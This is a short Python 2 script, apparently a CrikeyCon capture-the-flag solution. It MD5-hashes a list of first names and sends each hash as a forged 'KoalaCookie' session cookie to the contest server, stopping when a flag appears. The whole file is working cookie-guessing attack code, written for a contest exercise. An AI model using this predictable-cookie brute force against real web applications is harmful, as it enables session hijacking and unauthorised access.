CrikeyConCTF-Exploit.py

#!/usr/bin/python
#
#

import hashlib
import requests
import time

name = [ "bob", "dave", "jane", "tony", "sarah", "mary", "frank", "droppy", "laura", "john", "emma", "carl" ]
num = len(name)

target = open("/tmp/hash.out", 'w')
target.truncate()

for i in range(num):
    print name[i]+ " = " + (hashlib.md5(name[i].encode('utf-8')).hexdigest())
    target.write(hashlib.md5(name[i].encode('utf-8')).hexdigest())
    target.write("\n")
    print "=====================================>"
    print "GET http://ctf.crikeycon.com:8001 HTTP/1.1"
    print "Host: ctf.crikeycon.com"
    cookie=(hashlib.md5(name[i].encode('utf-8')).hexdigest())
    print "Cookie: KoalaCookie=" +cookie
    cookies = dict(KoalaCookie=cookie)
    req = requests.get("http://ctf.crikeycon.com:8001/", cookies=cookies)
    print (req.request.headers)
    print "<====================================="
    print (req.headers)
    print "<====================================="
    print(req.text)
    print "\n\n"
    if 'flag' in req.text:
        print "Success!"
        break
        exit
    else:
        print "No flag found."
    print "\n\n\n\n"
    time.sleep(3)